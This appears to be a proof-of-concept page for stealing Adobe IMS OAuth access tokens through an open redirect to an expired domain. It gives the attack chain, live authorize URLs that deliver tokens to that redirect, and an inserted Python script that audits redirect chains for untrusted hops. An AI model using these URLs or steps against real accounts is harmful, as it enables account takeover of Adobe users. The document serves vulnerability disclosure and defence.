Adobe IMS — OAuth Token Theft PoC
Security research demonstration. No data stored or exfiltrated. Researcher-owned test account only.
Attack Chain
1. Victim visits: https://ims-na1.adobelogin.com/ims/authorize/v2?client_id=adobedotcom2&response_type=token&...
2. IMS shows legitimate Adobe login — no third-party consent prompt (first-party client)
3. After auth, IMS redirects to: https://www.adobe.com/go/cc#access_token=<JWT>
4. Adobe 301 → http://coenraets.com/#access_token=<JWT> (stale shortlink, expired domain)
5. Browser preserves fragment across redirect — token lands here
6. Attacker reads window.location.hash → full account access
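A defensive check for the condition in steps 3 to 5, as an added example that is not part of the original PoC: it walks the redirect chain behind a registered redirect_uri and fails if any hop leaves the trusted HTTPS origin. The response table, the adobe.com allowlist and the function names are assumptions made for illustration; only the /go/cc entry mirrors the chain described above.

```python
from urllib.parse import urlsplit, urljoin

# Constructed stand-in for live HTTP responses: URL -> (status, Location).
# The /go/cc entry mirrors step 4 above; the other paths are placeholders.
SAMPLE_RESPONSES = {
    "https://www.adobe.com/go/cc": (301, "http://coenraets.com/"),
    "https://www.adobe.com/go/example-internal": (302, "/example-landing"),
    "https://www.adobe.com/example-landing": (200, None),
    "http://coenraets.com/": (200, None),
}

# Assumption: domains this client is meant to deliver tokens to.
TRUSTED_SUFFIXES = ("adobe.com",)


def is_trusted(url, suffixes=TRUSTED_SUFFIXES):
    """True only for https URLs on a trusted domain or one of its subdomains."""
    parts = urlsplit(url)
    host = (parts.hostname or "").lower()
    on_domain = any(host == s or host.endswith("." + s) for s in suffixes)
    return parts.scheme == "https" and on_domain


def audit_redirect_uri(redirect_uri, responses, max_hops=10):
    """Walk the redirect chain that starts at a registered redirect_uri.

    Returns (verdict, chain). Browsers re-attach the URL fragment to a
    redirect target that carries none, so every hop in the chain can see
    an implicit-flow token delivered to redirect_uri.
    """
    chain, url, seen = [redirect_uri], redirect_uri, set()
    for _ in range(max_hops):
        if not is_trusted(url):
            return "FAIL: leaves trusted origin at " + url, chain
        if url in seen:
            return "FAIL: redirect loop", chain
        seen.add(url)
        status, location = responses.get(url, (None, None))
        if status is None:
            return "UNKNOWN: no response recorded for " + url, chain
        if status not in (301, 302, 303, 307, 308):
            return "OK", chain
        url = urljoin(url, location)  # resolve relative Location headers
        chain.append(url)
    return "FAIL: too many hops", chain
```

Run against real responses, this belongs in a scheduled job over every registered redirect_uri, since a shortlink target can lapse long after registration.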
Adobe Profile — Live API Call
Creative Cloud Storage — Live API Call
Test URLs
Visit these while logged into an Adobe account:
Implicit flow (direct token):
https://ims-na1.adobelogin.com/ims/authorize/v2?client_id=adobedotcom2&response_type=token&scope=openid,AdobeID&redirect_uri=https://www.adobe.com/go/cc
Auth code flow:
https://ims-na1.adobelogin.com/ims/authorize/v2?client_id=adobedotcom2&response_type=code&scope=openid,AdobeID&redirect_uri=https://www.adobe.com/go/cc